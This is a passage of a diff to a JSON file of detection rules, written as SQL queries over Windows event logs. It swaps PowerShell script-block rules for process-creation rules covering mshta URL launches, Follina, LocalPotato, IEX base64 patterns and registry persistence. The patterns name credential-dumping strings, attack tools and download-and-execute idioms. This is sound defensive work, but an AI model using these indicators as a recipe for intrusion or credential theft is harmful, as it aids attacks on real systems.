'%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", + "status": "experimental", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", - "id": "603c6630-5225-49c1-8047-26c964553e0e", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Potential In-Memory Execution Using Reflection.Assembly", - "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "title": "Suspicious Extrac32 Execution", + "id": "aa8e035d-7be4-48d3-a944-102aec04400d", "status": "experimental", - "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", + "description": "Download or Copy file with Extrac32", "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "posh_ps_dotnet_assembly_from_file.yml" + "filename": "proc_creation_win_lolbin_extrac32.yml" }, { - "title": "Suspicious Invoke-Item From Mount-DiskImage", - "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "title": "Direct Autorun Keys Modification", + "id": "24357373-078f-44ed-9ac4-6d334a668a11", "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "author": "frack113", + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" ], - "filename": "posh_ps_run_from_mount_diskimage.yml" + "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", + "title": "Remote Access Tool - RURAT Execution From Unusual Location", + "id": "e01fa958-6893-41d4-ae03-182477c5e77d", "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + }, + { + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "status": "test", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_regedit_trustedinstaller.yml" + }, + { + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "falsepositives": [ + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", - "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockLogging LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockLogging LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Windows PowerShell Upload Web Request", - "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", + "title": "Lolbin Runexehelper Use As Proxy", + "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", "status": "experimental", - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1020" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" ], - "filename": "posh_ps_upload.yml" + "filename": "proc_creation_win_lolbin_runexehelper.yml" }, { - "title": "Change User Agents with WebRequest", - "id": "d4488827-73af-4f8d-9244-7b7662ef046e", - "status": "experimental", - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", - "author": "frack113", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Suspicious X509Enrollment - Ps Script", - "id": "504d63cb-0dba-4d02-8531-e72981aace2c", + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate administrative script" + "Legitimate scripts that use IEX" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_x509enrollment.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Powershell LocalAccount Manipulation", - "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1204" + ], + "falsepositives": [ + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_malware_snatch_ransomware.yml" + }, + { + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", "status": "test", - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "author": "frack113", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_localuser.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "PowerShell WMI Win32_Product Install MSI", - "id": "91109523-17f0-4248-a800-f81d9e7c081d", - "status": "experimental", - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "title": "Changing Existing Service ImagePath Value Via Reg.EXE", + "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" ], - "filename": "posh_ps_win32_product_install_msi.yml" + "filename": "proc_creation_win_reg_service_imagepath_change.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", - "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "status": "test", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - 